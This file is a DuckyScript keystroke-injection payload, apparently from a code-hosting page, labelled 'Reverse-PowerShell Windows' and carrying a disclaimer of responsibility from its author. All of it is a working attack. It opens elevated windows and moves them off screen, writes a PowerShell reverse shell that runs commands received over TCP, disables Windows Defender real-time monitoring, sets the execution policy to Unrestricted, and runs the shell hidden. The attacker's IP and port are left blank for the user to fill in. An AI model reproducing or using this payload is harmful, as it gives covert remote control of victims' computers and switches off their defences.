60 lines
1.5 KiB
Plaintext
60 lines
1.5 KiB
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
||
REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
|
||
REM Version: 1.0
|
||
REM Category: Remote_Access
|
||
DELAY 750
|
||
GUI r
|
||
DELAY 1000
|
||
STRING powershell Start-Process notepad -Verb runAs
|
||
ENTER
|
||
DELAY 750
|
||
ALT y
|
||
DELAY 750
|
||
ENTER
|
||
ALT SPACE
|
||
DELAY 1000
|
||
STRING m
|
||
DELAY 1000
|
||
DOWNARROW
|
||
REPEAT 100
|
||
ENTER
|
||
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
|
||
ENTER
|
||
DELAY 750
|
||
STRING Set-MpPreference -DisableRealtimeMonitoring $true
|
||
DELAY 500
|
||
ENTER
|
||
DELAY 750
|
||
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
|
||
ENTER
|
||
STRING Remove-Item $MyINvocation.InvocationName
|
||
ENTER
|
||
CTRL s
|
||
DELAY 1000
|
||
STRING C:\Windows\config-34593.ps1
|
||
ENTER
|
||
DELAY 1000
|
||
ALT F4
|
||
DELAY 750
|
||
GUI r
|
||
DELAY 750
|
||
STRING powershell Start-Process cmd -Verb runAs
|
||
ENTER
|
||
DELAY 750
|
||
ALT y
|
||
DELAY 1000
|
||
STRING mode con:cols=14 lines=1
|
||
ENTER
|
||
ALT SPACE
|
||
DELAY 750
|
||
STRING m
|
||
DELAY 750
|
||
DOWNARROW
|
||
REPEAT 100
|
||
ENTER
|
||
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
|
||
ENTER
|
||
DELAY 750
|
||
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
|
||
ENTER
|